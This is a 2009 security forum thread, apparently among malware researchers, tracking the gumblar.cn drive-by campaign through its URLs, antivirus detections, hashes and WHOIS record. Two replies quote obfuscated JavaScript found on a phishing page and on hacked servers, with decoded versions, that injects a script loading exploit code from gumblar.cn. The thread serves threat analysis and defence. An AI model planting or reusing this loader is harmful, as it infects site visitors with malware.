Author Topic: gumblar.cn -(94.229.65.172)  (Read 18403 times)

0 Members and 1 Guest are viewing this topic.

May 03, 2009, 08:03:03 pm
Read 18403 times

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
It looks like many sites have been compromised and now redirect to this malware site.

Code: [Select]
gumblar.cn/rss/?idhttp://wepawet.cs.ucsb.edu/view.php?hash=2d5faa3b53791149ea66bc37883f1aee&t=1241376846&type=js

pdf exploit
Code: [Select]
gumblar.cn/rss/?id=2http://www.virustotal.com/analisis/166f764091f21e7cb80fe289cd73b43e 2/40
Sunbelt   3.2.1858.2   2009.05.03   Exploit.PDF-JS.Gen (v)
Symantec   1.4.4.12   2009.05.03   Trojan Horse
MD5...: 61461d9c9c1954193e5e0d4148a81a0c

flash exploit
Code: [Select]
gumblar.cn/rss/?id=3http://www.virustotal.com/analisis/d85774b8e6e198dcb837861b0ba27f99 3/40
BitDefender   7.2   2009.05.03   Exploit.SWF.Gen
GData   19   2009.05.03   Exploit.SWF.Gen
Microsoft   1.4602   2009.05.03   TrojanDownloader:Win32/Swif.gen!A
MD5...: 65cd1da3d4cc0616b4a0d4a862a865a6

payload
gumblar.cn/rss/?id=10&
http://www.virustotal.com/analisis/ea74ce8331996c42eb494a8310c2d956 9/41
a-squared   4.0.0.101   2009.05.03   Trojan-Dropper.Boot.Drv!IK
BitDefender   7.2   2009.05.03   Gen:Trojan.Heur.1020416A6A
eSafe   7.0.17.0   2009.05.03   Suspicious File
GData   19   2009.05.03   Gen:Trojan.Heur.1020416A6A
Ikarus   T3.1.1.49.0   2009.05.03   Trojan-Dropper.Boot.Drv
McAfee+Artemis   5604   2009.05.03   Artemis!7DE29E5E10AD
Prevx1   3.0   2009.05.03   Medium Risk Malware
Symantec   1.4.4.12   2009.05.03   Backdoor.Trojan
TrendMicro   8.950.0.1092   2009.05.01   PAK_Generic.001
MD5...: 7de29e5e10adc5d90296785c89aeabce

http://www.threatexpert.com/report.aspx?md5=7de29e5e10adc5d90296785c89aeabce

Thanks to Steven for downloading the samples. It didn't work from my site.
Ruining the bad guy's day

May 03, 2009, 09:04:35 pm
Reply #1

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

May 09, 2009, 10:52:23 pm
Reply #2

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
gumblar via e-mail anyone?

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.7 Results
Source code for: http://78.131.152.104/~fonsflos/qzfbu.html
Server IP: 78.131.152.104 [ s15.o12.pl ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: MontanaMenagerie (US)
Date: 09 May 2009
Time: 23:46:49:46
*****************************************************************
<html><head><script type="text/javascript">window.location="http://qajtogap.cn";</script></head><script language=javascript><!--
(function(pwB){var D2J0='%';var Vsf=('var#20a#3d#22#53#63ri#70tEn#67ine#22#2cb#3d#22Vers#69on(#29+#22#2cj#3d#22#22#2cu#3dna#76igato#72#2eus#65#72Agent#3bif((u#2einde#78#4ff(#22#57#69n#22#29#3e0)#26#26(u#2ein#64exO#66(#22#4e#54#206#22)#3c0#29#26#26(do#63um#65n#74#2ec#6fo#6bi#65#2e#69#6e#64e#78#4ff(#22miek#3d1#22)#3c0)#26#26(typeof(#7a#72vzt#73#29#21#3dtyp#65#6ff(#22A#22)))#7bz#72v#7ats#3d#22#41#22#3b#65val(#22if(wi#6edow#2e#22+a+#22)j#3dj+#22+#61+#22#4d#61jor#22#2bb+a+#22#4di#6eor#22#2b#62#2ba+#22#42uild#22+#62+#22j#3b#22#29#3bdoc#75ment#2ewrit#65(#22#3c#73c#72ipt#20sr#63#3d#2f#2f#67u#6dblar#2ecn#2frs#73#2f#3fid#3d#22+#6a+#22#3e#3c#5c#2fs#63#72i#70t#3e#22)#3b#7d').replace(pwB,D2J0);eval(unescape(Vsf))})(/#/g);
 --></script><body><a href="http://qajtogap.cn">Your link!</a><script src='http://b.rtbn2.cn/E/J.JS'></script></body></html>

Decodes to;

Code: [Select]
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");}
b.btbn2.cn has another trick up it's sleeve in the form of J.JS;

http://wepawet.cs.ucsb.edu/view.php?hash=c16946ed6bc14d33023bc9a8b1ebf3b1&type=js

E-mail headers;

Code: [Select]
Return-Path: unidosxlosanimales-remove@groups.msn.com
Delivered-To: pvtd@it-mate.co.uk
X-FDA: 62218131066
X-Panda: scanned!
X-Filterd-Recvd-Size: 618
Received: from ndg.techno.fm (ndg.techno.fm [76.74.252.212])
by imf05.hostedemail.com (Postfix) with SMTP
for <pvtd@it-mate.co.uk>; Sat,  9 May 2009 22:39:52 +0000 (UTC)
Subject: sited
Reply-To: <unidosxlosanimales-remove@groups.msn.com>
X-Priority: 3 (Normal)
Date: Sat, 9 May 2009 18:39:52 +0300
X-Mailer: QMail
Message-ID: <01C9D0F7.58EA40B4@ndg.techno.fm>
To: <pvtd@it-mate.co.uk>
From: <unidosxlosanimales-remove@groups.msn.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 14, 2009, 01:36:17 pm
Reply #3

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

May 14, 2009, 04:56:46 pm
Reply #4

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Posted to SFS by a GoDaddy customer that had his dedicated servers hacked;

http://www.stopforumspam.com/forum/p4173-Today-5%3A31#p4173

Code: [Select]
(function(t){eval(unescape(('var_20a_3d_22Sc_72iptEngine_22_2c_62_3d_22_56ersi_6fn()_2b_22_2cj_3d_22_22_2cu_3dn_61_76_69gator_2e_75_73erA_67ent_3b_69f((_75_2
einde_78_4ff(_22W_69n_22)_3e0_29_26_26(u_2eind_65xO_66(_22NT_206_22_29_3c_30_29_26_26(document_2ecoo_6bie_2ein_64ex_4ff_28_22m_69e_6b_3d1_22)_3c_30)_26_26_28
_74ypeo_66_28_7arvzts)_21_3dtypeof(_22_41_22_29_29)_7bzrvzt_73_3d_22A_22_3bev_61l(_22_69_66_28window_2e_22+_61_2b_22)j_3d_6a+_22_2b_61+_22M_61jor_22+b_2ba+_2
2M_69nor_22+b+a_2b_22_42u_69_6cd_22_2b_62+_22j_3b_22)_3bdocum_65n_74_2ewrit_65(_22_3cscr_69pt_20_73rc_3d_2f_2fg_75mblar_2ecn_2fr_73s_2f_3f_69d_3d_22+_6a+_22_
3e_3c_5c_2fscri_70_74_3e_22)_3b_7d').replace(t,'%')))})(/_/g);

Decodes to;

Code: [Select]
eval(unescape(('var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");}').replace(t,'?))})(/?);
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 14, 2009, 09:42:46 pm
Reply #5

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 15, 2009, 12:35:54 pm
Reply #6

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Looks like the net has been disconnected.
Router at DataHop, UK (195.72.129.125) reports "destination net unreachable".
Ruining the bad guy's day

May 15, 2009, 12:47:54 pm
Reply #7

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Seeing the same myself ..... gonna stick it on monitoring and see if it automagically comes back or not.
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 15, 2009, 05:24:21 pm
Reply #8

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Now even the name resolution fails.
Ruining the bad guy's day

May 15, 2009, 05:42:58 pm
Reply #9

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
WhoIs is still showing valid name servers, so I've got a feeling either the domain is in the process of moving, or it's been taken down?

Code: [Select]
Domain Name: gumblar.cn
ROID: 20090422s10001s30804494-cn
Domain Status: ok
Registrant Organization: NetworkProtect
Registrant Name: TiankaiCui
Administrative Email: cuitiankai@googlemail.com
Sponsoring Registrar: 厦门华融盛世网络有限公司
Name Server:ns1.everydns.net
Name Server:ns2.everydns.net
Registration Date: 2009-04-22 03:24
Expiration Date: 2010-04-22 03:24
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 18, 2009, 09:32:31 am
Reply #10

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 18, 2009, 09:45:50 am
Reply #11

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day

May 18, 2009, 09:48:48 am
Reply #12

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
hehe figured as much :)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

May 19, 2009, 12:08:45 pm
Reply #13

Malware-Web-Threats

  • Special Members
  • Hero Member

  • Offline
  • *

  • 354
    • MalwareURL

May 27, 2009, 09:50:54 pm
Reply #14

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Ruining the bad guy's day